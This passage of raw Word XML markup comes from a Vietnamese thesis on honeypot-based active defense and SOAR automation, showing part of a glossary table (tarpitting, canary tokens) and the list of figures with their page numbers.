              </w:rPr>
              <w:t>Connection Tarpitting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Kỹ thuật làm chậm và giam giữ kết nối mạng</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Canary Token</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Honeytoken / Canary Webhook</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Dữ liệu mồi nhử dùng để phát hiện đánh cắp và lộ lọt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="003366"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>DANH MỤC HÌNH VẼ MINH HỌA</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="80" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="003366"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Bảng 0.2: Danh mục các hình vẽ và biểu đồ trong đồ án</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:jc w:val="center"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="8" w:space="0" w:color="1E293B"/>
          <w:bottom w:val="single" w:sz="8" w:space="0" w:color="1E293B"/>
          <w:left w:val="none"/>
          <w:right w:val="none"/>
          <w:insideH w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
          <w:insideV w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
        </w:tblBorders>
        <w:tblCellMar>
          <w:top w:w="120" w:type="dxa"/>
          <w:bottom w:w="120" w:type="dxa"/>
          <w:left w:w="160" w:type="dxa"/>
          <w:right w:w="160" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3134"/>
        <w:gridCol w:w="3134"/>
        <w:gridCol w:w="3134"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Ký hiệu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Tên hình minh họa</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Trang</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Hình 2.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Mô hình phân loại Honeypot theo mức độ tương tác (Low, Medium, High)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Hình 2.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Kiến trúc mô phỏng hệ thống tệp và lệnh của Cowrie Honeypot</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Hình 2.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Vòng đời xử lý sự cố an ninh chuẩn NIST SP 800-61 r2 tích hợp SOAR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Hình 3.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Sơ đồ kiến trúc tổng thể 5 phân lớp của Hệ sinh thái Active Defense &amp; SOAR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Hình 3.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Lưu đồ thuật toán Động cơ Tương quan Sự kiện và Ánh xạ MITRE ATT&amp;CK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Hình 3.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Cơ chế bẫy mồi Honeytoken và khử ẩn danh kẻ tấn công (De-anonymization)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>26</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Hình 3.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Giao diện Thẻ cảnh báo và Bàn phím tương tác Inline Buttons của Telegram SOAR Bot</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>29</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Hình 3.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Sơ đồ Kiến trúc Mạng Bẫy Mồi Phân tán (Distributed Honeynet Cluster Architecture)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>31</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Hình 5.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Đo lường Hiệu quả Làm chậm &amp; Triệt tiêu Tấn công của Cơ chế Tarpit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>34</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Hình 5.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>So sánh Thời gian Phản ứng Sự cố: Quy trình Thủ công vs Tự động hóa SOAR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>36</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Hình 5.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Biểu đồ phân bố Kỹ thuật Tấn công ghi nhận trên Cowrie (Chuẩn MITRE ATT&amp;CK)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>38</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="003366"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>DANH MỤC BẢNG BIỂU DỮ LIỆU</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="80" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
